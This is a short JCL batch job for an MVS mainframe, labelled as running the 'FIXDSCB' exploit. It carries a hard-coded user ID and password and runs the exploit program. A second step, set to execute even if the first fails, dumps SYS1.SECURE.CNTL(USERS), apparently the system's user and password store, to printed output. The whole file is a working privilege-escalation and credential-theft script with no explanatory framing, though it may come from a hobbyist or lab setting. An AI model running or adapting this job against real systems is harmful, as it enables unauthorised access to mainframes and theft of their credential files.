//FIXDSCB  JOB (TSO),
//             'RUN FIXDSCB EXPLOIT',
//             CLASS=A,
//             MSGCLASS=A,
//             MSGLEVEL=(1,1),
//             REGION=0K,
//             USER=MVSCE02,
//             PASSWORD=PASS4U
//FIXDSCB    EXEC PGM=FIXDSCB
//SYSPRINT DD   SYSOUT=A
//STEPLIB  DD   DISP=SHR,DSN=SYSC.LINKLIB
//SYSIN    DD   DISP=SHR,DSN=IBMUSER.FIX32760
//SYSUDUMP DD   SYSOUT=A
//STEP01 EXEC PGM=IEBGENER,COND=EVEN
//SYSPRINT DD SYSOUT=*
//SYSIN    DD DUMMY
//SYSUT1   DD DSN=SYS1.SECURE.CNTL(USERS),DISP=SHR
//SYSUT2   DD SYSOUT=A
//SYSTSPRT DD SYSOUT=A